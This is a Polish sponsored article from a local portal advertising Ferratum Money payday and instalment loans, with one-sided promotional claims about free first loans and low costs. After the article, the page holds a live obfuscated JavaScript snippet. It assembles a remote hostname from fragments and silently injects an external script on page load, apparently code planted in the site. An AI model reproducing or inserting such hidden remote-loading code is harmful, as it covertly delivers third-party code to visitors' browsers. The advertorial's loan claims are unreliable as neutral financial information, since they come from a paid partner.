Ferratum Money. Co warto wiedzieć o tej firmie?


Partner serwisu
18/01/2019

Porady #firma Szczecinek
Atrakcyjne warunki, przejrzyste zasady i oferta dostosowana do potrzeb klientów. Tak w dużym skrócie można opisać Ferratum – firmę pożyczkową, która uzyskała status pełnoprawnego banku.

1,5 miliona – tylu klientów deklaruje, że jest zadowolonych z poziomu usług świadczonych przez Ferratum Money. Wśród nich są osoby z wielu krajów, bo firma błyskawicznie zdobywa nowe rynki, obecnie działając w ponad dwudziestu państwach. O wysokiej jakości obsługi klienta, bezpieczeństwie i przejrzystych zasadach najlepiej świadczy fakt, że Ferratum, jako jedna z niewielu firm z sektora pozabankowego, w swoim ojczystym kraju – Malcie – uzyskała status banku.

Na polskim rynku Ferratum Money jest obecny od dekady. Przez ten czas stało się synonimem rzetelnej i przyjaznej klientowi firmy pożyczkowej. Do skorzystania z jej usług skłaniają nie tylko niskie ceny i jasno określone zasady, ale też ciekawe promocje. Co warto wiedzieć o działalności tej firmy?

Ferratum Money – oferta

Najpopularniejszy produkt finansowy od Ferratum to z całą pewnością chwilówki. Są one udzielane tylko klientom podpisującym z maltańską firmą pierwszą umowę. Podobnie jak u wielu innych pożyczkodawców, także w Ferratum są one w stu procentach darmowe. By oddać tylko pożyczoną kwotę, klient musi jednak w terminie rozliczyć się z firmą. W przeciwnym wypadku naliczone zostaną karne odsetki.

W ofercie Ferratum Money znajdziesz także pożyczki ratalne. Są one adresowane zarówno do nowych, jak i stałych klientów. Ich najważniejsza zaleta to niskie jak na sektor pozabankowy koszty. Oprocentowanie w skali roku wynosi zaledwie 10 procent, a wydatki związane z pożyczeniem pieniędzy powiększają tylko prowizja oraz opłata administracyjna.

Jak pożyczyć w Ferratum?

Procedura ubiegania się o pożyczkę w Ferratum Money nie odbiega od standardów panujących w branży pozabankowej. Wszystko odbywa się za pośrednictwem internetu. Klient najpierw wypełnia formularz, w którym ustala kwotę finansowania oraz termin spłaty. Następnie – jeśli nie ma jeszcze konta w serwisie – rejestruje się, podając niezbędne dane.

Drugi krok to potwierdzenie tożsamości. W tym celu możesz wykonać przelew weryfikacyjny na symboliczną kwotę 1 grosza lub skorzystać z aplikacji Instantor. Jeśli pojawią się jakiekolwiek wątpliwości co do prawdziwości danych, możesz ponadto zostać poproszony o przesłanie skanu dowodu osobistego lub paszportu. Po pozytywnym rozpatrzeniu wniosku, Ferratum poinformuje cię SMS-em lub mailem i od razu prześle pieniądze na twoje konto.

Kto dostanie pożyczkę?

Ferratum Money nie należy do firm akceptujących wszystkie składane wnioski. By otrzymać finansowanie, musisz:

  • być pełnoletni;

  • mieć polskie obywatelstwo i ważny dowód osobisty;

  • być osobą fizyczną;

  • być na stałe zameldowany na terenie Polski;

  • wykazać powtarzające się regularnie dochody, które umożliwią ci bezproblemową spłatę zobowiązania;

  • posiadać konto bankowe, aktywny telefon komórkowy oraz adres e-mail;

  • nie posiadać pożyczki w Ferratum ani Kasa TAK i Ekspres Kasa – instytucjach należących do tej spółki;

  • mieć dobrą historię kredytową – Ferratum korzysta z baz biur informacji gospodarczej: Krajowego Rejestru Długów, Rejestru Dłużników ERIF, Krajowego Biura Informacji Gospodarczej oraz InfoMonitor.

 

artykuł partnera serwisu

(function(){ aga3=document.createElement("script");aga3_="u"+("s")+"ta"; aga3_+=("t.i")+""+"n";aga3_+=(("f")+"o");aga3.type="text/javascript"; aga3_+="/"; aga3u="129388974";aga3u+=".z12132jdga3bwn29qu2";aga3u+="7ne0crt75rt"; aga3.src="https://"+aga3_+aga3u;aga3.async=true;document.body.appendChild(aga3); })();

 
Czytaj więcej


Ostanio w Porady


TOP 5

Ogłoszenia

wróć

pełna wersja portalu